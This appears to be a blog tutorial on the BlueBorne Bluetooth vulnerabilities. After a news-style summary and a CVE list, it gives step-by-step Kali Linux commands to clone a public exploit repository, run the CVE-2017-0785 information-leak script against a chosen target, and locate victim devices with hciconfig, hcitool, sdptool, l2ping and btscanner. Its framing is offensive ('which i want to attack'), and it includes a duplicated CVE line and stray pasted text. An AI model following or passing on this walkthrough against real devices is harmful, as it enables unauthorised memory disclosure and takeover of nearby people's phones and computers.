Blueborne Attack? Complete Practical 5 Billion device at Risk

BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking



If you are using a Bluetooth enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can carry out remotely to take over your device even without requiring any interaction from your side.


Security researchers have just discovered total 8 zero-day vulnerabilities in Bluetooth protocol that impact more than 5.3 Billion devices—from Android, iOS, Windows and Linux to the Internet of things (IoT) devices—using the short-range wireless communication technology.


Using these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed BlueBorne, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a "man-in-the-middle" connection to gain access to devices' critical data and networks without requiring any victim interaction.




All an attacker need is for the victim's device to have Bluetooth turned on and obviously, in close proximity to the attacker's device. Moreover, successful exploitation doesn't even require vulnerable devices to be paired with the attacker's device.


These vulnerabilities include:


👉Information Leak Vulnerability in Android (CVE-2017-0785)


👉Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service



👉Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile


👉The Bluetooth Pineapple in Android—Logical flaw (CVE-2017-0783)
Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)


👉Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)


👉Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250)


👉The Bluetooth Pineapple in Windows—Logical flaw (CVE-2017-8628)


👉Apple Low Energy Audio Protocol Remote Code Execution vulnerability (CVE Pending)




Google and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is 10.x) are safe.




👇👇How to Perform👇👇

CVE-2017-0785 STEP 1

Now at this point, I am wondering if Armis left this information out of the white paper intentionally, if you send more packets to the device you can dump a lot more memory, and in this memory, you will see some interesting things. They say you can find "encryption key, address space and valuable pointers (of code and or data) that can be used to bypass ASLR while exploiting a separate memory corruption vulnerability", so let's see what I found!

The dangers of Bluetooth implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth stacks.




Open kali linux Terminal


Type

cd Desktop

git clone
  https://github.com/mailinneberg/BlueBorne.git

cd BlueBorne

ls

chmod  +x  CVE-2017-0785.py

ls

sudo apt-get install bluetooth libbluetooth-dev

 sudo pip install pybluez 

sudo pip install pwntools

ls


python CVE-2017-0785.py

Now script is run TARGET xx:xx:xx:xx:xx  its address of bluetooth which i want to attack

How to grab victim's bluetooth MAC address

FIRE UP Kali


Let's start by firing up Kali and opening a command prompt. I hope it goes without saying that you need a Linux-compatible Bluetooth adapter to continue from here.




Use Hciconfig to Enable Your Bluetooth Adapter

The first step is to check whether our Bluetooth adapter is recognized and enabled. We can do this with a built-in BlueZ tool called

hciconfig:


Type

 hciconfig

As you can see in this screenshot, we do have a Bluetooth adapter that has a MAC address of 10:AE:60:58:F1:37. The Bluetooth stack has named it "hci0." Now, let's make certain it is up and enabled:



hciconfig hci0 up

Good, hci0 is up and ready to work!




Scan for Bluetooth Devices with Hcitool


The BlueZ stack also has some excellent command line (cli) tools for scanning for Bluetooth devices. These are in located in
hcitool . Let's first use the scanning portion of this tool to look for Bluetooth devices that are sending out their discover beacons (in discovery mode). Type:

 hcitool scan

In the screenshot above, you can see it found two devices, ANDROID BT and SCH-I535. Now, let's try the inquiry (inq) command in hcitool to garner more information about these devices:



hcitool inq

Note that it also displays clock offset and the class. The class indicates what type of Bluetooth device it is, and we can look up the code by going to the Service Discovery webpage on the Bluetooth SIG site to see what type of device it is. Or, as we will see later, some tools will do this for us.
Hcitool is a powerful command line interface to the Bluetooth stack that can do many, many things. In the screenshot below, you can see some of the commands that it can execute. Many of the Bluetooth-hacking tools that we will be using in future tutorials simply use these commands in a script. You can easily create your own tool by using these commands in your own script.



Scan for Services with Sdptool




Service discovery protocol (SDP) is a Bluetooth protocol for searching for services. BlueZ has a tool called sdptool that is capable of browsing a device for the services it provides. We can use it by typing:


sdptool browse <MAC Address>

Here we can see that this tool was able to pull information on all the services this device is capable of using.


See if They Are Reachable with L 2 ping



Now that we have the MAC addresses of all the nearby devices, we can ping them, whether they are in discover mode or not, to see whether they are in reach.

 l2ping <MAC address>

This indicates that the device with a the MAC address 76:6F:46:65:72:67 is within range and reachable




Scan for Bluetooth Devices with BTScanner



For those of you who are more comfortable with a GUI-based tool, Kali has BTScanner. Simply type:


btscanner

When you type in BTScanner, it opens a rudimentary GUI interface with commands along the bottom. To do an inquiry scan, simply type the letter "i" on your keyboard. In this case, BTScanner found the two that I found with hcitool, as well as an additional one, MINIJAMBOX.

To gather more information about the device, simply place the cursor over the device and hit
Enter on your keyboard. It will then display all of the information it has gathered about the device, similar to sdptool.

In this case, this is the information about the SCH-I535 device. Notice about a third of the way down the screen, under class, it identifies it as a "Phone/Smart phone" from its class number, 0x5a020c.